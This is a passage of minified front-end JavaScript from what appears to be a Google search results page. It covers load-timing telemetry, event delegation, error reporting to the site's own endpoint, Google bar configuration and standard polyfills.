d(f){c(f);k(a,"load",d);k(a,"error",d)}h(a,"load",d);b&&h(a,"error",d)};e.google.aft=function(a){a.setAttribute("data-iml",String(Date.now()))};google.startTick("load");var l=google.timers.load;a:{var m=l.t;if(g){var n=g.timing;if(n){var p=n.navigationStart,q=n.responseStart;if(q>p&&q<=m.start){m.start=q;l.wsrt=q-p;break a}}g.now&&(l.wsrt=Math.floor(g.now()))}} function r(a){if("hidden"===document.visibilityState){google.c.wve&&(google.c.fh=a);var b;window.performance&&window.performance.timing&&(b=Math.floor(window.performance.timing.navigationStart+a));google.tick("load","fht",b);return!0}return!1}function t(a){r(a.timeStamp)&&k(document,"visibilitychange",t,!0)}google.c.wve&&(google.c.fh=Infinity);h(document,"visibilitychange",t,!0);r(0);google.c.b("pr");google.c.b("xe");if(google.c.gl){var u=function(a){a&&e.google.aft(a.target)};h(document.documentElement,"load",u,!0);google.c.glu=function(){k(document.documentElement,"load",u,!0)}};}).call(this);})();(function(){ function h(){return window.performance&&window.performance.navigation&&window.performance.navigation.type};function n(a){if(!a||r(a))return 0;if(!a.getBoundingClientRect)return 1;var c=function(b){return b.getBoundingClientRect()};return t(a,c)?0:u(a,c)}function t(a,c){var b;a:{for(b=a;b&&void 0!==b;b=b.parentElement)if("hidden"===b.style.overflow)break a;b=null}if(!b)return!1;a=c(a);c=c(b);return a.bottom<c.top||a.top>=c.bottom||a.right<c.left||a.left>=c.right} function r(a){return"none"===a.style.display?!0:document.defaultView&&document.defaultView.getComputedStyle?(a=document.defaultView.getComputedStyle(a),!!a&&("hidden"===a.visibility||"0px"===a.height&&"0px"===a.width)):!1} function u(a,c){var b=c(a);a=b.left+window.pageXOffset;c=b.top+window.pageYOffset;var d=b.width;b=b.height;var e=0;if(0>=b&&0>=d)return e;var f=window.innerHeight||document.documentElement.clientHeight;0>c+b?e=2:c>=f&&(e=4);if(0>a+d||a>=(window.innerWidth||document.documentElement.clientWidth))e|=8;e||(e=1,c+b>f&&(e|=4));return e};var v=window.location,w="aft afti afts frt hct prt pprt sct".split(" ");function x(a){return(a=v.search.match(new RegExp("[?&]"+a+"=(\\d+)")))?Number(a[1]):-1};var y=window.innerHeight||document.documentElement.clientHeight,z=0,A=0,B=0,C=0,D=0,E=0,F=0,G=0,H=0,I=!0,K=!0,L=-1;function M(a,c,b,d){var e=google.timers.load.t[a];e&&(b||d&&null!=c&&c<e)||google.tick("load",a,c)}function N(a,c,b,d){"1"===a.getAttribute("data-frt")&&(M("frt",d,!1,!0),++C,O());c&&(M("aft",d,!1,!0),M("afti",d,!1,!0),++E,b||++H,O());google.c.timl&&M("iml",d,!1,!0);++A;a.setAttribute("data-frt","0");(google.c.timl||c)&&P()} function P(){var a=google.c.timl?A===z:D===E;!K&&a&&google.c.u("il")} function O(){if(!I){var a=E===D,c=C===B,b=H===G;b=google.c.nli?b:a;if(a&&c){google.c.e("load","ima",String(D));google.c.e("load","imad",String(F));google.c.e("load","aftp",String(Math.round(L)));var d=google.timers.load;a=d.m;if(!a||!a.prs){var e=h()?0:x("qsubts");0<e&&(a=x("fbts"),0<a&&(d.t.start=Math.max(e,a)));var f=d.t,l=f.start;a={wsrt:d.wsrt};for(var m=0,k;k=w[m++];){var p=f[k];p&&l&&(a[k]=p-l)}0<e&&(a.gsasrt=d.t.start-e);e=d.e;d="/gen_204?s="+google.sn+"&t=aft&atyp=csi&ei="+google.kEI+"&rt=";f="";for(g in a)d+=""+f+g+"."+a[g],f=",";for(var q in e)d+="&"+q+"="+e[q];window._cshid&&(d+="&cshid="+window._cshid);2===h()&&(d+="&bb=1");1===h()&&(d+="&r=1");if("gsasrt"in a){var g=x("qsd");0<g&&(d+="&qsd="+g)}google.kBL&&(d+="&bl="+google.kBL);g=d;navigator.sendBeacon?navigator.sendBeacon(g,""):google.log("","",g)}}"hidden"===document.visibilityState&&google.c.e("load","hddn","1");if(null!==google.aftq&&(g=2===google.fevent||3===google.fevent?google.fevent:1,2===g&&c||1===g&&b||3===g&&(b||c))){google.tick("load","aftqf",Date.now());var J;for(c=0;b=null==(J=google.aftq)?void 0:J[c++];)try{b()}catch(R){google.ml(R,!1)}google.aftq=null}}}var Q="src bsrc url ll image img-url".split(" ");function S(a){for(var c=0,b;b=Q[c++];)if(a.getAttribute("data-"+b))return!0;return!1}function T(a,c){0===c||c&8||(a.setAttribute("data-frt","1"),++B)}google.c.b("il");google.c.setup=function(a,c,b){var d=a.getAttribute("data-atf");if(d)return b=Number(d),c&&!a.hasAttribute("data-frt")&&T(a,b),b;var e="string"!==typeof a.src||!a.src,f=!!a.getAttribute("data-bsrc");d=!!a.getAttribute("data-deferred");var l=!d&&S(a);l&&a.setAttribute("data-lzy_","1");var m=n(a);a.setAttribute("data-atf",String(m));var k=!!(m&1);e=(e||a.complete)&&!d&&!f&&!(google.c.ll&&k&&l);f=!google.c.lhc&&Number(a.getAttribute("data-iml"))||0;++z;if(e&&!f||a.hasAttribute("data-noaft"))a.setAttribute("data-frt","0"),++A;else{var p=google.c.btfi&&m&4&&f&&L<y;if(p){var q=a.getBoundingClientRect().top+window.pageYOffset;!b||q<b?L=k?y:q:p=!1}k&&(++D,d&&++F,l||++G);c&&T(a,m);p&&M("aft",f,!1,!0);e&&f?N(a,k,l,google.c.btfi?0:f):(k&&(!b||b>=y)&&(L=y),google.rll(a,!0,function(){N(a,k,l,Date.now())}))}return m};google.c.ubr=function(a,c,b){0>L&&(b&&(L=b),google.c.btfi&&M("aft",c));a||M("afts",c,!0);M("aft",c,!0);I&&!google.c.frt&&(I=!1,O());a&&K&&(M("prt",c),google.c.timl&&M("iml",c,!0),K=!1,P(),google.c.setup=function(){return 0},google.c.ubr=function(){})};}).call(this);(function(){ var b=[function(){google.tick&&google.tick("load","dcl")}];google.dclc=function(a){b.length?b.push(a):a()};function c(){for(var a=b.shift();a;)a(),a=b.shift()}window.addEventListener?(document.addEventListener("DOMContentLoaded",c,!1),window.addEventListener("load",c,!1)):window.attachEvent&&window.attachEvent("onload",c);}).call(this);(function(){ var b=[];google.jsc={xx:b,x:function(a){b.push(a)},mm:[],m:function(a){google.jsc.mm.length||(google.jsc.mm=a)}};}).call(this);(function(){ var e=this||self; var f={};function w(a,c){if(null===c)return!1;if("contains"in a&&1==c.nodeType)return a.contains(c);if("compareDocumentPosition"in a)return a==c||!!(a.compareDocumentPosition(c)&16);for(;c&&a!=c;)c=c.parentNode;return c==a};var x=function(a,c){return function(d){d||(d=window.event);return c.call(a,d)}},z="undefined"!=typeof navigator&&/Macintosh/.test(navigator.userAgent),A=function(){this._mouseEventsPrevented=!0};var F=function(a){this.g=a;this.h=[]},G=function(a){for(var c=0;c<a.h.length;++c){var d=a.g,b=a.h[c];d.removeEventListener?d.removeEventListener(b.eventType,b.o,b.capture):d.detachEvent&&d.detachEvent("on"+b.eventType,b.o)}a.h=[]}; var H=e._jsa||{};H._cfc=void 0;H._aeh=void 0;var I=function(){this.h=this.g=null},K=function(a,c){var d=J;d.g=a;d.h=c;return d};I.prototype.i=function(){var a=this.g;this.g&&this.g!=this.h?this.g=this.g.__owner||this.g.parentNode:this.g=null;return a};var L=function(){this.j=[];this.g=0;this.h=null;this.l=!1};L.prototype.i=function(){if(this.l)return J.i();if(this.g!=this.j.length){var a=this.j[this.g];this.g++;a!=this.h&&a&&a.__owner&&(this.l=!0,K(a.__owner,this.h));return a}return null};var J=new I,M=new L; var Q=function(){this.s=[];this.g=[];this.h=[];this.l={};this.i=null;this.j=[];N(this,"_custom")},R=function(a){return String.prototype.trim?a.trim():a.replace(/^\s+/,"").replace(/\s+$/,"")},ha=function(a,c){return function m(b,g){g=void 0===g?!0:g;var l=c;if("_custom"==l){l=b.detail;if(!l||!l._type)return;l=l._type}var k=l;"click"==k&&(z&&b.metaKey||!z&&b.ctrlKey||2==b.which||null==b.which&&4==b.button||b.shiftKey)?k="clickmod":"keydown"==k&&!b.a11ysc&&(k="maybe_click");var u=b.srcElement||b.target;l=S(k,b,u,"",null);if(b.path){M.j=b.path;M.g=0;M.h=this;M.l=!1;var O=M}else O=K(u,this);for(var r;r=O.i();){var h=r;var p=void 0;r=h;var q=k,aa=b;var n=r.__jsaction;if(!n){var y;n=null;"getAttribute"in r&&(n=r.getAttribute("jsaction"));if(y=n){n=f[y];if(!n){n={};for(var B=y.split(ba),ca=B?B.length:0,C=0;C<ca;C++){var v=B[C];if(v){var D=v.indexOf(":"),P=-1!=D,ea=P?R(v.substr(0,D)):da;v=P?R(v.substr(D+1)):v;n[ea]=v}}f[y]=n}r.__jsaction=n}else n=fa,r.__jsaction=n}"maybe_click"==q&&n.click?(p=q,q="click"):"clickkey"==q?q="click":"click"!=q||n.click||(q="clickonly");p=H._cfc&&n.click?H._cfc(r,aa,n,q,p):{eventType:p?p:q,action:n[q]||"",event:null,ignore:!1};l=S(p.eventType,p.event||b,u,p.action||"",h,l.timeStamp);if(p.ignore||p.action)break}l&&"touchend"==l.eventType&&(l.event._preventMouseEvents=A);if(p&&p.action){if("mouseenter"==k||"mouseleave"==k||"pointerenter"==k||"pointerleave"==k)if(u=b.relatedTarget,!("mouseover"==b.type&&"mouseenter"==k||"mouseout"==b.type&&"mouseleave"==k||"pointerover"== b.type&&"pointerenter"==k||"pointerout"==b.type&&"pointerleave"==k)||u&&(u===h||w(h,u)))l.action="",l.actionElement=null;else{k={};for(var t in b)"function"!==typeof b[t]&&"srcElement"!==t&&"target"!==t&&(k[t]=b[t]);k.type="mouseover"==b.type?"mouseenter":"mouseout"==b.type?"mouseleave":"pointerover"==b.type?"pointerenter":"pointerleave";k.target=k.srcElement=h;k.bubbles=!1;l.event=k;l.targetElement=h}}else l.action="",l.actionElement=null;h=l;a.i&&!h.event.a11ysgd&&(t=S(h.eventType,h.event,h.targetElement,h.action,h.actionElement,h.timeStamp),"clickonly"==t.eventType&&(t.eventType="click"),a.i(t,!0));if(h.actionElement||"maybe_click"==h.eventType){if(a.i){if(!h.actionElement||"A"!=h.actionElement.tagName||"click"!=h.eventType&&"clickmod"!=h.eventType||(b.preventDefault?b.preventDefault():b.returnValue=!1),(b=a.i(h))&&g){m.call(this,b,!1);return}}else{if((g=e.document)&&!g.createEvent&&g.createEventObject)try{var E=g.createEventObject(b)}catch(ka){E=b}else E=b;h.event=E;a.j.push(h)}H._aeh&&H._aeh(h)}}},S=function(a,c,d,b,g,m){return{eventType:a,event:c,targetElement:d,action:b,actionElement:g,timeStamp:m||Date.now()}},ia=function(a,c){return function(d){var b=a,g=c,m=!1;"mouseenter"==b?b="mouseover":"mouseleave"==b?b="mouseout":"pointerenter"==b?b="pointerover":"pointerleave"==b&&(b="pointerout");if(d.addEventListener){if("focus"==b||"blur"==b||"error"==b||"load"==b)m=!0;d.addEventListener(b,g,m)}else d.attachEvent&&("focus"==b?b="focusin":"blur"==b&&(b="focusout"),g=x(d,g),d.attachEvent("on"+b,g));return{eventType:b,o:g,capture:m}}},N=function(a,c){if(!a.l.hasOwnProperty(c)){var d=ha(a,c),b=ia(c,d);a.l[c]=d;a.s.push(b);for(d=0;d<a.g.length;++d){var g=a.g[d];g.h.push(b.call(null,g.g))}"click"==c&&N(a,"keydown")}};Q.prototype.o=function(a){return this.l[a]};var W=function(a,c){var d=new F(c);a:{for(var b=0;b<a.g.length;b++)if(T(a.g[b].g,c)){c=!0;break a}c=!1}if(c)return a.h.push(d),d;U(a,d);a.g.push(d);V(a);return d},V=function(a){for(var c=a.h.concat(a.g),d=[],b=[],g=0;g<a.g.length;++g){var m=a.g[g];X(m,c)?(d.push(m),G(m)):b.push(m)}for(g=0;g<a.h.length;++g)m=a.h[g],X(m,c)?d.push(m):(b.push(m),U(a,m));a.g=b;a.h=d},U=function(a,c){var d=c.g;ja&&(d.style.cursor="pointer");for(d=0;d<a.s.length;++d)c.h.push(a.s[d].call(null,c.g))},Y=function(a,c){a.i=c;a.j&&(0<a.j.length&&c(a.j),a.j=null)},X=function(a,c){for(var d=0;d<c.length;++d)if(c[d].g!=a.g&&T(c[d].g,a.g))return!0;return!1},T=function(a,c){for(;a!=c&&c.parentNode;)c=c.parentNode;return a==c},ja="undefined"!=typeof navigator&&/iPhone|iPad|iPod/.test(navigator.userAgent),ba=/\s*;\s*/,da="click",fa={};var Z=new Q;W(Z,window.document.documentElement);N(Z,"click");N(Z,"focus");N(Z,"focusin");N(Z,"blur");N(Z,"focusout");N(Z,"error");N(Z,"load");N(Z,"auxclick");N(Z,"change");N(Z,"dblclick");N(Z,"input");N(Z,"keyup");N(Z,"keydown");N(Z,"keypress");N(Z,"mousedown");N(Z,"mouseenter");N(Z,"mouseleave");N(Z,"mouseout");N(Z,"mouseover");N(Z,"mouseup");N(Z,"paste");N(Z,"touchstart");N(Z,"touchend");N(Z,"touchcancel");N(Z,"transitioncancel");N(Z,"transitionend");N(Z,"transitionrun");N(Z,"transitionstart");N(Z,"speech");(function(a){google.jsad=function(c){Y(a,c)};google.jsaac=function(c){return W(a,c)};google.jsarc=function(c){G(c);for(var d=!1,b=0;b<a.g.length;++b)if(a.g[b]===c){a.g.splice(b,1);d=!0;break}if(!d)for(d=0;d<a.h.length;++d)if(a.h[d]===c){a.h.splice(d,1);break}V(a)}})(Z);e.gws_wizbind=function(a){return{trigger:function(c){var d=a.o(c.type);d||(N(a,c.type),d=a.o(c.type));var b=c.target||c.srcElement;d&&d.call(b.ownerDocument.documentElement,c)},bind:function(c){Y(a,c)}}}(Z);}).call(this);(function(){ function b(c){var a;a:{for(a=c.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName&&"1"===a.getAttribute("data-jsarwt"))break a;a=null}a&&window.jsarwt(a,null,c);return!0};window.document.documentElement.addEventListener("mousedown",b,!0);window.document.documentElement.addEventListener("touchstart",b,!0);}).call(this);</script> <script nonce="8M/qAlUr4l/+csJGNfb3NA==">(function(){google.xjs={ck:'xjs.s.OhEY3Yzzv5g.L.F4.O',cs:'ACT90oGA4pxZHM-0sRg-EcqSVI4cwil1ew',excm:[]};})();</script> <script nonce="8M/qAlUr4l/+csJGNfb3NA==">(function(){google.kEXPI='0,1302530,2397798,621,22,16,413610,47348,75389,10419,14171,20450,36484,39106,8110,35664,24483,16217,94389,5950,4886,2720,18243,9904,8697,6729,17525,419,17700,4660,17671,3997,2130,4226,9,6462,44,799,1571,13714,1556,2181,2421,2669,3532,3642,545,824,1187,267,3614,6461,7279,415,244,715,2324,1556,3172,276,1025,2918,45,223,795,3,577,104,479,577,519,46,520,305,5464057,2131,723,415,5996354,30817019,15633,2157,1480,2203,1222,1651';})();function _DumpException(e){throw e;} function _F_installCss(c){} (function(){window.google.xjsu='/xjs/_/js/k\x3dxjs.s.en_GB.u31cbyd-Fyk.O/am\x3dAFQAwAAAAABzQQEAAAAAAAAAAk8sAACER0ISAAAACAAAAAQBBgQBAAAAfEQXAMAfAMAAS7gAAAAAAAAABNgSZKhBIiAABAAAAAAQq4kqBgABgA/d\x3d1/ed\x3d1/dg\x3d2/esmo\x3d1/rs\x3dACT90oFzQYWaHJNgyZkBt0AarQg8xS53Xg/m\x3dcdos,cr,dpf,hsm,jsa,d,csi';})();</script> <script defer="" src="/xjs/_/js/k=xjs.s.en_GB.u31cbyd-Fyk.O/am=AFQAwAAAAABzQQEAAAAAAAAAAk8sAACER0ISAAAACAAAAAQBBgQBAAAAfEQXAMAfAMAAS7gAAAAAAAAABNgSZKhBIiAABAAAAAAQq4kqBgABgA/d=1/ed=1/dg=2/esmo=1/rs=ACT90oFzQYWaHJNgyZkBt0AarQg8xS53Xg/m=cdos,cr,dpf,hsm,jsa,d,csi" nonce="8M/qAlUr4l/+csJGNfb3NA=="></script> <script nonce="8M/qAlUr4l/+csJGNfb3NA==">(function(){ window.rwt=function(){return!0};}).call(this);(function(){ var a=this||self;function d(c){var b;a:{if(b=a.navigator)if(b=b.userAgent)break a;b=""}return-1!=b.indexOf(c)};function h(){return d("Safari")&&!(k()||d("Coast")||d("Opera")||d("Edge")||d("Edg/")||d("OPR")||d("Firefox")||d("FxiOS")||d("Silk")||d("Android"))}function k(){return(d("Chrome")||d("CriOS"))&&!d("Edge")||d("Silk")};var m=function(c){return String(c).replace(/\-([a-z])/g,function(b,e){return e.toUpperCase()})};var n=d("Trident")||d("MSIE");!d("Android")||k();k();h();var p=!n&&!h();window.jsarwt=function(c,b,e){if(!b)if(p&&c.dataset)b=c.dataset;else{b={};for(var l=c.attributes,f=0;f<l.length;++f){var g=l[f];if(0==g.name.lastIndexOf("data-",0)){var q=m(g.name.substr(5));b[q]=g.value}}}if(!("jrwt"in b))if(window.rwt(c,"","","",b.cd||"",b.usg||"","",b.ved||"",Number(b.au)||null,b.psig||"",e),p&&c.dataset)c.dataset.jrwt="1";else{if(/-[a-z]/.test("jrwt"))throw Error("a");c.setAttribute.call(c,"data-"+"jrwt".replace(/([A-Z])/g,"-$1").toLowerCase(),"1")}return!1};}).call(this);(function(){window.google.erd={jsr:1,bv:1547,sd:true,de:true};})();(function(){var sdo=false;var mei=10; var f=this||self;var g,h=null!=(g=f.mei)?g:1,m,n=null!=(m=f.sdo)?m:!0,p=0,q,r=google.erd,u=r.jsr;google.ml=function(a,b,d,k,c){c=void 0===c?2:c;b&&(q=a&&a.message);if(google.dl)return google.dl(a,c,d),null;if(0>u){window.console&&console.error(a,d);if(-2===u)throw a;b=!1}else b=!a||!a.message||"Error loading script"===a.message||p>=h&&!k?!1:!0;if(!b)return null;p++;d=d||{};var e=c;c=encodeURIComponent;b="/gen_204?atyp=i&ei="+c(google.kEI);google.kEXPI&&(b+="&jexpid="+c(google.kEXPI));b+="&srcpg="+c(google.sn)+"&jsr="+c(r.jsr)+"&bver="+c(r.bv)+("&jsel="+e);e=a.lineNumber;void 0!==e&&(b+="&line="+ e);var l=a.fileName;l&&(b+="&script="+c(l),e&&l===window.location.href&&(e=document.documentElement.outerHTML.split("\n")[e],b+="&cad="+c(e?e.substring(0,300):"No script found.")));for(var t in d)b+="&",b+=c(t),b+="=",b+=c(d[t]);b=b+"&emsg="+c(a.name+": "+a.message);b=b+"&jsst="+c(a.stack||"N/A");12288<=b.length&&(b=b.substr(0,12288));a=b;k||google.log(0,"",a);return a};window.onerror=function(a,b,d,k,c){q!==a&&(a=c instanceof Error?c:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)?2:0));q=null;n&&p>=h&&(window.onerror=null)};})();;this.gbar_={CONFIG:[[[0,"www.gstatic.com","og.qtm.en_US.YFCIDJappVs.O","co.in","en","538",0,[4,2,"","","","432834893","0"],null,"yfQuYvinL4jz-QbK7aGABg",null,0,"og.qtm.jmpMi5x4AhM.L.F4.O","AA2YrTuVGYC4WI8IjwLZ-60blF8tpparTw","AA2YrTuNOfi2WlfWL2endGD347FH4SNb8A","",2,1,200,"IND",null,null,"1","538",1],null,[1,0.1000000014901161,2,1],[1,0.001000000047497451,1],[0,0,0,null,"","","",""],[0,0,"",1,0,0,0,0,0,0,null,0,0,null,0,0,null,null,0,0,0,"","","","","","",null,0,0,0,0,0,null,null,null,"rgba(32,33,36,1)","rgba(255,255,255,1)",0,0,1,null,null,1,0,0],null,null,["1","gci_91f30755d6a6b787dcc2a4062e6e9824.js","googleapis.client:gapi.iframes","","en"],null,null,null,null,["m;/_/scs/abc-static/_/js/k=gapi.gapi.en.fQLVS3SAB_U.O/d=1/rs=AHpOoo9-gtqpJORJvBFDdao_eAhWe8xjHw/m=__features__","https://apis.google.com","","","","",null,1,"es_plusone_gc_20220110.0_p0","en",null,0],[0.009999999776482582,"co.in","538",[null,"","0",null,1,5184000,null,null,"",null,null,null,null,null,0,null,0,0,1,0,0,0,null,null,0,0,null,0,0,0,0],null,null,null,0,null,null,["5061451","google\\.(com|ru|ca|by|kz|com\\.mx|com\\.tr)$",1]],[1,1,null,40400,538,"IND","en","432834893.0",8,0.009999999776482582,0,0,null,null,null,null,"3700949,3700971,3700987",null,null,null,"yfQuYvinL4jz-QbK7aGABg",0,0,0],[[null,null,null,"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.YFCIDJappVs.O/rt=j/m=qabr,q_dnp,qcwid,qapid,qald/exm=qaaw,qadd,qaid,qein,qhaw,qhbr,qhch,qhga,qhid,qhin,qhpr/d=1/ed=1/rs=AA2YrTuVGYC4WI8IjwLZ-60blF8tpparTw"],[null,null,null,"https://www.gstatic.com/og/_/ss/k=og.qtm.jmpMi5x4AhM.L.F4.O/m=qcwid/excm=qaaw,qadd,qaid,qein,qhaw,qhbr,qhch,qhga,qhid,qhin,qhpr/d=1/ed=1/ct=zgms/rs=AA2YrTuNOfi2WlfWL2endGD347FH4SNb8A"]],null,null,null,[[[null,null,[null,null,null,"https://ogs.google.com/widget/app/so"],0,448,328,57,4,1,0,0,63,64,8000,"https://www.google.co.in/intl/en/about/products",67,1,69,null,1,70,"Can't seem to load the app launcher right now. Try again or go to the %1$sGoogle Products%2$s page.",3,0,0,74,0,null,null,null,null,null,null,null,"/widget/app/so"]],0,[null,null,null,"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.YFCIDJappVs.O/rt=j/m=qdsh/d=1/ed=1/rs=AA2YrTuVGYC4WI8IjwLZ-60blF8tpparTw"],"1","538",1,0,null,"en",0,null,0,0]]],};this.gbar_=this.gbar_||{};(function(_){var window=this; try{ var ja,ra,sa,ua,va,wa,xa,Ea,Fa,Da,Ga,Ca,Ia,Oa,Pa,Qa,Ra,Sa,Ta,Va,Wa,$a,ab;_.aa=function(a){if(Error.captureStackTrace)Error.captureStackTrace(this,_.aa);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))};_.ba=function(){var a=_.n.navigator;return a&&(a=a.userAgent)?a:""};_.p=function(a){return-1!=_.ba().indexOf(a)};_.ca=function(){return _.p("Opera")};_.da=function(){return _.p("Trident")||_.p("MSIE")};_.ea=function(){return _.p("Firefox")||_.p("FxiOS")}; _.ha=function(){return _.p("Safari")&&!(_.fa()||_.p("Coast")||_.ca()||_.p("Edge")||_.p("Edg/")||_.p("OPR")||_.ea()||_.p("Silk")||_.p("Android"))};_.fa=function(){return(_.p("Chrome")||_.p("CriOS"))&&!_.p("Edge")||_.p("Silk")};_.ia=function(){return _.p("Android")&&!(_.fa()||_.ea()||_.ca()||_.p("Silk"))};ja=function(){return _.p("iPhone")&&!_.p("iPod")&&!_.p("iPad")};_.ka=function(){return ja()||_.p("iPad")||_.p("iPod")}; _.la=function(a){var b=a.length;if(0<b){for(var c=Array(b),d=0;d<b;d++)c[d]=a[d];return c}return[]};_.ma=function(){return-1!=_.ba().toLowerCase().indexOf("webkit")&&!_.p("Edge")};_.pa=function(a){return _.oa&&null!=a&&a instanceof Uint8Array};ra=function(a,b){Object.isFrozen(a)||(qa?a[qa]|=b:void 0!==a.Rd?a.Rd|=b:Object.defineProperties(a,{Rd:{value:b,configurable:!0,writable:!0,enumerable:!1}}))};sa=function(a){var b;qa?b=a[qa]:b=a.Rd;return null==b?0:b};_.ta=function(a){ra(a,1);return a}; ua=function(a){return Array.isArray(a)?!!(sa(a)&2):!1};va=function(a){if(!Array.isArray(a))throw Error("v");ra(a,2)};wa=function(a){return null!==a&&"object"===typeof a&&!Array.isArray(a)&&a.constructor===Object};xa=function(a){return{value:a,configurable:!1,writable:!1,enumerable:!1}};_.Ba=function(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "object":if(a&&!Array.isArray(a)){if(_.pa(a))return _.za(a);if("function"==typeof _.Aa&&a instanceof _.Aa)return a.lh()}}return a}; Ea=function(a,b){b=void 0===b?Ca:b;return Da(a,b)};Fa=function(a,b){if(null!=a){if(Array.isArray(a))a=Da(a,b);else if(wa(a)){var c={},d;for(d in a)c[d]=Fa(a[d],b);a=c}else a=b(a);return a}};Da=function(a,b){for(var c=a.slice(),d=0;d<c.length;d++)c[d]=Fa(c[d],b);Array.isArray(a)&&sa(a)&1&&_.ta(c);return c};Ga=function(a){if(a&&"object"==typeof a&&a.toJSON)return a.toJSON();a=_.Ba(a);return Array.isArray(a)?Ea(a,Ga):a};Ca=function(a){return _.pa(a)?new Uint8Array(a):a}; Ia=function(a,b){b.rd&&(a.rd=b.rd.slice());var c=b.j;if(c){b=b.o;for(var d in c){var e=c[d];if(e){var f=!(!b||!b[d]),g=+d;if(Array.isArray(e)){if(e.length)for(f=_.Ha(a,e[0].constructor,g,f),g=0;g<Math.min(f.length,e.length);g++)Ia(f[g],e[g])}else(f=_.r(a,e.constructor,g,void 0,f))&&Ia(f,e)}}}};_.t=function(a,b){return null!=a?!!a:!!b};_.u=function(a,b){void 0==b&&(b="");return null!=a?a:b};_.Ja=function(a,b){void 0==b&&(b=0);return null!=a?a:b}; _.Ka=function(a,b,c){for(var d in a)b.call(c,a[d],d,a)};_.La=function(a){var b=[],c=0,d;for(d in a)b[c++]=a[d];return b};_.Na=function(a,b){for(var c,d,e=1;e<arguments.length;e++){d=arguments[e];for(c in d)a[c]=d[c];for(var f=0;f<Ma.length;f++)c=Ma[f],Object.prototype.hasOwnProperty.call(d,c)&&(a[c]=d[c])}};Oa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}; Pa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};Qa=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};Ra=Qa(this); Sa=function(a,b){if(b)a:{var c=Ra;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&Pa(c,a,{configurable:!0,writable:!0,value:b})}}; Sa("Symbol",function(a){if(a)return a;var b=function(f,g){this.j=f;Pa(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.j};var c="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("b");return new b(c+(f||"")+"_"+d++,f)};return e}); Sa("Symbol.iterator",function(a){if(a)return a;a=Symbol("c");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=Ra[b[c]];"function"===typeof d&&"function"!=typeof d.prototype[a]&&Pa(d.prototype,a,{configurable:!0,writable:!0,value:function(){return Ta(Oa(this))}})}return a});Ta=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a}; _.Ua=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:Oa(a)}};Va="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b};if("function"==typeof Object.setPrototypeOf)Wa=Object.setPrototypeOf;else{var Xa;a:{var Ya={a:!0},Za={};try{Za.__proto__=Ya;Xa=Za.a;break a}catch(a){}Xa=!1}Wa=Xa?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError("d`"+a);return a}:null}$a=Wa; _.w=function(a,b){a.prototype=Va(b.prototype);a.prototype.constructor=a;if($a)$a(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.Y=b.prototype};ab=function(a,b,c){if(null==a)throw new TypeError("e`"+c);if(b instanceof RegExp)throw new TypeError("f`"+c);return a+""}; Sa("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=ab(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for(var g=0;g<f&&c<e;)if(d[c++]!=b[g++])return!1;return g>=f}});Sa("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});var bb=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)}; Sa("WeakMap",function(a){function b(){}function c(l){var m=typeof l;return"object"===m&&null!==l||"function"===m}function d(l){if(!bb(l,f)){var m=new b;Pa(l,f,{value:m})}}function e(l){var m=Object[l];m&&(Object[l]=function(q){if(q instanceof b)return q;Object.isExtensible(q)&&d(q);return m(q)})}if(function(){if(!a||!Object.seal)return!1;try{var l=Object.seal({}),m=Object.seal({}),q=new a([[l,2],[m,3]]);if(2!=q.get(l)||3!=q.get(m))return!1;q.delete(l);q.set(m,4);return!q.has(l)&&4==q.get(m)}catch(v){return!1}}())return a; var f="$jscomp_hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var g=0,k=function(l){this.j=(g+=Math.random()+1).toString();if(l){l=_.Ua(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("g");d(l);if(!bb(l,f))throw Error("h`"+l);l[f][this.j]=m;return this};k.prototype.get=function(l){return c(l)&&bb(l,f)?l[f][this.j]:void 0};k.prototype.has=function(l){return c(l)&&bb(l,f)&&bb(l[f],this.j)};k.prototype.delete=function(l){return c(l)&& bb(l,f)&&bb(l[f],this.j)?delete l[f][this.j]:!1};return k}); Sa("Map",function(a){if(function(){if(!a||"function"!=typeof a||!a.prototype.entries||"function"!=typeof Object.seal)return!1;try{var k=Object.seal({x:4}),l=new a(_.Ua([[k,"s"]]));if("s"!=l.get(k)||1!=l.size||l.get({x:4})||l.set({x:4},"t")!=l||2!=l.size)return!1;var 